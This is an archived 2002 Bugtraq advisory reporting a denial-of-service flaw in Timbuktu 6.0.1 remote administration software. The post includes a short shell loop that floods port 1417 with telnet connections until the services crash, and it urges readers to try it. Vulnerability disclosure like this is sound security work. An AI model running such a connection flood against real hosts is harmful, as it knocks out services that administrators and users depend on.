[23916] in bugtraq
Timbuktu 6.0.1 and Older DoS Advisory
daemon@ATHENA.MIT.EDU (Tekno pHReak)
Mon Jan 21 16:00:44 2002
Date: 18 Jan 2002 01:22:23 -0000
Message-ID: <20020118012223.22310.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Tekno pHReak <tek@superw00t.com>
To: bugtraq@securityfocus.com
Timbuktu 6.0.1 and Older DoS Advisory
*************************************
Discovered by: Teknophreak of Malloc()
**************************************
E-mail: Tek@superw00t.com
"Timbuktu" is a remote administration suite that is
available for MacOS and Windows operating
systems.
Timbuktu utilizes a range of ports between (1417 -
1420). There exist a Denial of Service vulnerability
that will crash all timbuktu services running.
To exploit this all you must do is choose one of the
Timbuktu ports that are open and make a large
number of connections to it and if you keep a watch
you will see that all the Timbuktu ports available will
close one by one.
If your admin doesn't mind try this against the
machine using timbuktu :
#!/bin/sh
while:
do
telnet tb2.host.com 1417 &
done
This will cause the timbuktu services to die out.
Simple Enough Kids!
